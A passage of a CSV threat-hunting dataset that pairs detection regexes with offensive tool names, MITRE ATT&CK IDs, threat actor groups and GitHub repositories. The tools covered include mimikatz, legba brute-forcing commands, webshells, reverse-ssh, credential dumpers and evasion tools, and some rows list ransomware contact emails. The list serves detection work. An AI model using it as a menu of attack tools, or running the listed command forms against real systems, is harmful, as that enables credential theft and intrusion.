Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","50920" "*Lecture KIWI_MSV1_0_*",".{0,1000}Lecture\sKIWI_MSV1_0_.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","https://www.virustotal.com/gui/file-analysis/ZTNjYTA2MmQ2YzhiYWUwMjc4Y2U5YmIwNmVhMDVkNDA6MTcyNDUyNTI4Ng==","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","50921" "*Led-Zeppelin\'s LFI File dumper*",".{0,1000}Led\-Zeppelin\\\'s\sLFI\sFile\sdumper.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#content","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","50922" 
"*leechristensen/UnmanagedPowerShell*",".{0,1000}leechristensen\/UnmanagedPowerShell.{0,1000}","offensive_tool_keyword","UnmanagedPowerShell","Executes PowerShell from an unmanaged process","T1059 - T1086","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/leechristensen/UnmanagedPowerShell","1","1","N/A","N/A","6","5","487","113","2016-03-17T05:20:55Z","2014-12-15T00:59:03Z","50923" "*Leeon123/Aoyama*",".{0,1000}Leeon123\/Aoyama.{0,1000}","offensive_tool_keyword","Aoyama ","Python Botnet ","T1059 - T1219 - T1090 - T1102 - T1213 - T1095 - T1071 - T1486 - T1083 - T1041 - T1012 - T1027","TA0011 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/Leeon123/Aoyama","1","1","N/A","N/A","10","10","260","63","2022-03-23T09:49:43Z","2019-07-16T13:04:07Z","50924" "*Leeon123/Python3-botnet*",".{0,1000}Leeon123\/Python3\-botnet.{0,1000}","offensive_tool_keyword","Aoyama ","Python Botnet ","T1059 - T1219 - T1090 - T1102 - T1213 - T1095 - T1071 - T1486 - T1083 - T1041 - T1012 - T1027","TA0011 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/Leeon123/Aoyama","1","1","N/A","N/A","10","10","260","63","2022-03-23T09:49:43Z","2019-07-16T13:04:07Z","50925" "*leftp/BackupCreds*",".{0,1000}leftp\/BackupCreds.{0,1000}","offensive_tool_keyword","BackupCreds","A C# implementation of dumping credentials from Windows Credential Manager","T1003 - T1555","TA0006 - TA0005","N/A","Black Basta","Credential Access","https://github.com/leftp/BackupCreds","1","1","N/A","N/A","9","1","57","10","2023-09-23T10:37:05Z","2023-09-23T06:42:20Z","50926" "*legalhackers.com/exploits/CVE*",".{0,1000}legalhackers\.com\/exploits\/CVE.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","50927" 
"*legalrestore@airmail.cc*",".{0,1000}legalrestore\@airmail\.cc.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","50928" "*legba * --username*",".{0,1000}legba\s.{0,1000}\s\-\-username.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","N/A","10","10","1577","93","2025-03-01T15:42:29Z","2023-10-23T15:44:06Z","50929" "*legba amqp *--target *",".{0,1000}legba\samqp\s.{0,1000}\-\-target\s.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","N/A","10","10","1577","93","2025-03-01T15:42:29Z","2023-10-23T15:44:06Z","50930" "*legba dns *--data *",".{0,1000}legba\sdns\s.{0,1000}\-\-data\s.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","N/A","10","10","1577","93","2025-03-01T15:42:29Z","2023-10-23T15:44:06Z","50931" "*legba ftp *--target *",".{0,1000}legba\sftp\s.{0,1000}\-\-target\s.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","N/A","10","10","1577","93","2025-03-01T15:42:29Z","2023-10-23T15:44:06Z","50932" "*legba http 
*--http-payload *",".{0,1000}legba\shttp\s.{0,1000}\-\-http\-payload\s.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","N/A","10","10","1577","93","2025-03-01T15:42:29Z","2023-10-23T15:44:06Z","50933" "*legba http.basic *--target *",".{0,1000}legba\shttp\.basic\s.{0,1000}\-\-target\s.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","N/A","10","10","1577","93","2025-03-01T15:42:29Z","2023-10-23T15:44:06Z","50934" "*legba http.enum *--http*",".{0,1000}legba\shttp\.enum\s.{0,1000}\-\-http.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","N/A","10","10","1577","93","2025-03-01T15:42:29Z","2023-10-23T15:44:06Z","50935" "*legba http.ntlm1 *",".{0,1000}legba\shttp\.ntlm1\s.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","N/A","10","10","1577","93","2025-03-01T15:42:29Z","2023-10-23T15:44:06Z","50936" "*legba http.ntlm2 *",".{0,1000}legba\shttp\.ntlm2\s.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential 
Access","https://github.com/evilsocket/legba","1","0","N/A","N/A","10","10","1577","93","2025-03-01T15:42:29Z","2023-10-23T15:44:06Z","50937" "*legba imap *--target *",".{0,1000}legba\simap\s.{0,1000}\-\-target\s.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","N/A","10","10","1577","93","2025-03-01T15:42:29Z","2023-10-23T15:44:06Z","50938" "*legba kerberos *--target *",".{0,1000}legba\skerberos\s.{0,1000}\-\-target\s.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","N/A","10","10","1577","93","2025-03-01T15:42:29Z","2023-10-23T15:44:06Z","50939" "*legba kerberos*--kerberos-realm *",".{0,1000}legba\skerberos.{0,1000}\-\-kerberos\-realm\s.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","N/A","10","10","1577","93","2025-03-01T15:42:29Z","2023-10-23T15:44:06Z","50940" "*legba ldap *--ldap-domain*",".{0,1000}legba\sldap\s.{0,1000}\-\-ldap\-domain.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","N/A","10","10","1577","93","2025-03-01T15:42:29Z","2023-10-23T15:44:06Z","50941" "*legba mongodb* --target *",".{0,1000}legba\smongodb.{0,1000}\s\-\-target\s.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and 
enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","N/A","10","10","1577","93","2025-03-01T15:42:29Z","2023-10-23T15:44:06Z","50942" "*legba mssql * --target *",".{0,1000}legba\smssql\s.{0,1000}\s\-\-target\s.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","N/A","10","10","1577","93","2025-03-01T15:42:29Z","2023-10-23T15:44:06Z","50943" "*legba mysql * --target *",".{0,1000}legba\smysql\s.{0,1000}\s\-\-target\s.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","N/A","10","10","1577","93","2025-03-01T15:42:29Z","2023-10-23T15:44:06Z","50944" "*legba pgsql * --target *",".{0,1000}legba\spgsql\s.{0,1000}\s\-\-target\s.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","N/A","10","10","1577","93","2025-03-01T15:42:29Z","2023-10-23T15:44:06Z","50945" "*legba pop3 *--target *",".{0,1000}legba\spop3\s.{0,1000}\-\-target\s.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","N/A","10","10","1577","93","2025-03-01T15:42:29Z","2023-10-23T15:44:06Z","50946" "*legba rdp *--target *",".{0,1000}legba\srdp\s.{0,1000}\-\-target\s.{0,1000}","offensive_tool_keyword","legba","A multiprotocol 
credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","N/A","10","10","1577","93","2025-03-01T15:42:29Z","2023-10-23T15:44:06Z","50947" "*legba sftp *--target *",".{0,1000}legba\ssftp\s.{0,1000}\-\-target\s.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","N/A","10","10","1577","93","2025-03-01T15:42:29Z","2023-10-23T15:44:06Z","50948" "*legba smtp *--target *",".{0,1000}legba\ssmtp\s.{0,1000}\-\-target\s.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","N/A","10","10","1577","93","2025-03-01T15:42:29Z","2023-10-23T15:44:06Z","50949" "*legba ssh *--target *",".{0,1000}legba\sssh\s.{0,1000}\-\-target\s.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","N/A","10","10","1577","93","2025-03-01T15:42:29Z","2023-10-23T15:44:06Z","50950" "*legba stomp *--target*",".{0,1000}legba\sstomp\s.{0,1000}\-\-target.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","N/A","10","10","1577","93","2025-03-01T15:42:29Z","2023-10-23T15:44:06Z","50951" "*legba telnet 
*--telnet-*",".{0,1000}legba\stelnet\s.{0,1000}\-\-telnet\-.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","N/A","10","10","1577","93","2025-03-01T15:42:29Z","2023-10-23T15:44:06Z","50952" "*legba vnc* --target *",".{0,1000}legba\svnc.{0,1000}\s\-\-target\s.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","N/A","10","10","1577","93","2025-03-01T15:42:29Z","2023-10-23T15:44:06Z","50953" "*legba-main.zip*",".{0,1000}legba\-main\.zip.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","1","N/A","N/A","10","10","1577","93","2025-03-01T15:42:29Z","2023-10-23T15:44:06Z","50954" "*leitosama/SharpZeroLogon*",".{0,1000}leitosama\/SharpZeroLogon.{0,1000}","offensive_tool_keyword","SharpZeroLogon","exploit for CVE-2020-1472","T1210 - T1558.003 - T1078.002 - T1098 - T1003.006","TA0001 - TA0004 - TA0005 - TA0006 - TA0003","Ghost Ransomware","N/A","Exploitation tool","https://github.com/leitosama/SharpZeroLogon","1","1","N/A","N/A","10","1","27","17","2021-02-13T10:13:32Z","2021-02-13T09:44:43Z","50955" "*lem0nSec/ShellGhost*",".{0,1000}lem0nSec\/ShellGhost.{0,1000}","offensive_tool_keyword","ShellGhost","A memory-based evasion technique which makes shellcode invisible from process start to end","T1055.012 - T1027.002 - T1055.001","TA0005 - TA0040","N/A","N/A","Defense 
Evasion","https://github.com/lem0nSec/ShellGhost","1","1","N/A","N/A","N/A","10","1175","140","2023-10-16T06:40:24Z","2023-07-01T16:56:58Z","50957" "*LemonSaaS/ghostsocks*",".{0,1000}LemonSaaS\/ghostsocks.{0,1000}","offensive_tool_keyword","ghostsocks","SOCKS5 proxy based on lightsocks","T1090.002 - T1090","TA0005 - TA0008","Lumma Stealer","N/A","Defense Evasion","https://github.com/LemonSaaS/ghostsocks","1","1","N/A","N/A","7","1","2","1","2017-11-14T16:56:05Z","2017-11-13T03:38:57Z","50958" "*lengjibo/FourEye*",".{0,1000}lengjibo\/FourEye.{0,1000}","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","1","N/A","N/A","10","8","758","152","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z","50959" "*leo4j.gitbook.io/amnesiac*",".{0,1000}leo4j\.gitbook\.io\/amnesiac.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","50960" "*Leo4j/Amnesiac*",".{0,1000}Leo4j\/Amnesiac.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","50961" "*Leo4j/Ask4Creds*",".{0,1000}Leo4j\/Ask4Creds.{0,1000}","offensive_tool_keyword","Ask4Creds","Prompt User for credentials","T1056 - T1071","TA0006 - TA0009","N/A","N/A","Credential 
Access","https://github.com/Leo4j/Ask4Creds","1","1","N/A","N/A","8","1","1","0","2024-03-20T17:09:21Z","2023-11-12T15:21:40Z","50962" "*Leo4j/CheckSMBSigning*",".{0,1000}Leo4j\/CheckSMBSigning.{0,1000}","offensive_tool_keyword","CheckSMBSigning","Checks for SMB signing disabled on all hosts in the network","T1018 - T1550","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/Leo4j/CheckSMBSigning","1","1","N/A","N/A","6","1","8","1","2023-10-13T11:55:33Z","2023-05-17T11:47:52Z","50963" "*Leo4j/Invoke-ADEnum*",".{0,1000}Leo4j\/Invoke\-ADEnum.{0,1000}","offensive_tool_keyword","Invoke-ADEnum","Automate Active Directory Enumeration","T1016 - T1482","TA0007","N/A","N/A","Discovery","https://github.com/Leo4j/Invoke-ADEnum","1","1","N/A","N/A","7","5","448","50","2025-04-09T10:13:47Z","2023-04-18T11:19:42Z","50964" "*Leo4j/Invoke-RunAsSystem*",".{0,1000}Leo4j\/Invoke\-RunAsSystem.{0,1000}","offensive_tool_keyword","Invoke-RunAsSystem","A simple script to elevate current session to SYSTEM (needs to be run as Administrator)","T1548.002 - T1059.001","TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/Leo4j/Invoke-RunAsSystem","1","1","N/A","N/A","8","1","14","1","2024-11-11T17:18:20Z","2023-08-24T15:12:40Z","50965" "*Leo4j/Invoke-SessionHunter*",".{0,1000}Leo4j\/Invoke\-SessionHunter.{0,1000}","offensive_tool_keyword","Invoke-SessionHunter","Retrieve and display information about active user sessions on remote computers. 
No admin privileges required","T1033 - T1078 - T1110","TA0007","N/A","N/A","Discovery","https://github.com/Leo4j/Invoke-SessionHunter","1","1","N/A","N/A","7","2","183","20","2024-08-12T13:15:10Z","2023-08-13T13:22:05Z","50966" "*Leo4j/Invoke-SMBRemoting*",".{0,1000}Leo4j\/Invoke\-SMBRemoting.{0,1000}","offensive_tool_keyword","Invoke-SMBRemoting","Interactive Shell and Command Execution over Named-Pipes (SMB)","T1059 - T1021.002 - T1572","TA0002 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Invoke-SMBRemoting","1","1","N/A","N/A","9","2","163","25","2024-12-05T16:30:18Z","2023-09-06T16:00:47Z","50967" "*Leo4j/KeyCredentialLink*",".{0,1000}Leo4j\/KeyCredentialLink.{0,1000}","offensive_tool_keyword","KeyCredentialLink","Add Shadow Credentials to a target object by editing their msDS-KeyCredentialLink attribute","T1098 - T1550","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/Leo4j/KeyCredentialLink","1","1","N/A","N/A","10","1","21","3","2024-06-05T13:44:39Z","2024-06-05T13:19:49Z","50968" "*Leo4j/PassSpray*",".{0,1000}Leo4j\/PassSpray.{0,1000}","offensive_tool_keyword","PassSpray","Domain Password Spray","T1110.003 - T1078","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/Leo4j/PassSpray","1","1","N/A","N/A","10","1","7","3","2025-02-20T10:07:43Z","2023-11-16T13:35:49Z","50969" "*Leo4j/PS2EXE*",".{0,1000}Leo4j\/PS2EXE.{0,1000}","offensive_tool_keyword","PS2EXE","Convert Powershell scripts to EXEs","T1059.001 - T1588","TA0042","N/A","N/A","Resource Development","https://github.com/Leo4j/PS2EXE","1","1","N/A","N/A","7","1","5","1","2024-08-31T12:34:50Z","2024-08-22T12:22:26Z","50970" "*Leo4j/ShellGen*",".{0,1000}Leo4j\/ShellGen.{0,1000}","offensive_tool_keyword","ShellGen","PowerShell script to generate ShellCode in various formats","T1059.001 - T1588","TA0042","N/A","N/A","Resource 
Development","https://github.com/Leo4j/ShellGen","1","1","N/A","N/A","7","1","41","10","2024-09-25T09:29:13Z","2024-08-22T13:32:06Z","50971" "*Leo4j/TGT_Monitor*",".{0,1000}Leo4j\/TGT_Monitor.{0,1000}","offensive_tool_keyword","TGT_Monitor","This script continuously monitors cache for new TGTs and displays them on the screen (admin privs required)","T1557.001 - T1040","TA0006 - TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/TGT_Monitor","1","1","N/A","N/A","9","1","3","0","2023-11-08T18:48:55Z","2023-11-07T22:53:45Z","50972" "*Leo4j/Token-Impersonation*",".{0,1000}Leo4j\/Token\-Impersonation.{0,1000}","offensive_tool_keyword","Token-Impersonation","Make a Token (local admin rights not required) or Steal the Token of the specified Process ID (local admin rights required)","T1134.001 - T1134.002","TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/Leo4j/Token-Impersonation","1","1","N/A","N/A","8","1","7","3","2024-03-20T17:07:13Z","2023-11-02T10:46:24Z","50973" "*leoloobeek/LAPSToolkit*",".{0,1000}leoloobeek\/LAPSToolkit.{0,1000}","offensive_tool_keyword","LAPSToolkit","Functions written in PowerShell that leverage PowerView to audit and attack Active Directory environments that have deployed Microsofts Local Administrator Password Solution (LAPS). It includes finding groups specifically delegated by sysadmins. finding users with All Extended Rights that can view passwords. 
and viewing all computers with LAPS enabled","T1087.001 - T1069 - T1069.003 - T1069.007 - T1069.002 - T1069.001","TA0007 - TA0008 - TA0009","N/A","Scattered Spider*","Discovery","https://github.com/leoloobeek/LAPSToolkit","1","1","N/A","N/A","10","9","859","119","2018-01-31T14:45:35Z","2016-04-27T00:06:20Z","50974" "*leonardred1989@protonmail.com*",".{0,1000}leonardred1989\@protonmail\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","50975" "*letmeinbrudipls*",".{0,1000}letmeinbrudipls.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","50976" "*LetMeOutSharp.*",".{0,1000}LetMeOutSharp\..{0,1000}","offensive_tool_keyword","cobaltstrike","Project to enumerate proxy configurations and generate shellcode from CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 
- TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EncodeGroup/AggressiveProxy","1","1","N/A","N/A","10","10","141","25","2020-11-04T16:08:11Z","2020-11-04T12:53:00Z","50977" "*LetMeowIn.exe*",".{0,1000}LetMeowIn\.exe.{0,1000}","offensive_tool_keyword","LetMeowIn","A sophisticated covert Windows-based credential dumper using C++ and MASM x64.","T1003 - T1055.011 - T1148","TA0006","N/A","N/A","Credential Access","https://github.com/Meowmycks/LetMeowIn","1","1","N/A","N/A","10","5","401","70","2024-07-08T15:58:37Z","2024-04-09T16:33:27Z","50978" "*LetMeowIn-main.zip*",".{0,1000}LetMeowIn\-main\.zip.{0,1000}","offensive_tool_keyword","LetMeowIn","A sophisticated covert Windows-based credential dumper using C++ and MASM x64.","T1003 - T1055.011 - T1148","TA0006","N/A","N/A","Credential Access","https://github.com/Meowmycks/LetMeowIn","1","1","N/A","N/A","10","5","401","70","2024-07-08T15:58:37Z","2024-04-09T16:33:27Z","50979" "*leviathansecurity/TunnelVision*",".{0,1000}leviathansecurity\/TunnelVision.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & 
Spoofing","https://github.com/leviathansecurity/TunnelVision","1","1","N/A","N/A","9","2","132","17","2024-05-08T19:40:13Z","2024-03-11T22:24:56Z","50981" "*lexfo/sshimpanzee*",".{0,1000}lexfo\/sshimpanzee.{0,1000}","offensive_tool_keyword","sshimpanzee","SSHD Based implant supporting tunneling mecanisms to reach the C2 (DNS - ICMP - HTTP Encapsulation - HTTP/Socks Proxies - UDP","T1572 - T1095 - T1090 - T1043","TA0010 - TA0011 - TA0005","N/A","Scattered Spider*","C2","https://github.com/lexfo/sshimpanzee","1","1","N/A","N/A","10","10","263","27","2025-03-05T08:32:56Z","2023-04-03T10:11:27Z","50982" "*Lexus89/SharpPack*",".{0,1000}Lexus89\/SharpPack.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","1","N/A","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","50983" "*LFI scanner checks.jar*",".{0,1000}LFI\sscanner\schecks\.jar.{0,1000}","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Mr-xn/BurpSuite-collections","1","0","N/A","N/A","N/A","10","3533","676","2025-03-05T12:04:51Z","2020-01-25T02:07:37Z","50984" "*lgandx/Pcredz*",".{0,1000}lgandx\/Pcredz.{0,1000}","offensive_tool_keyword","Pcredz","This tool extracts Credit card numbers. NTLM(DCE-RPC. HTTP. SQL. LDAP. etc). Kerberos (AS-REQ Pre-Auth etype 23). HTTP Basic. SNMP. POP. SMTP. FTP. IMAP. 
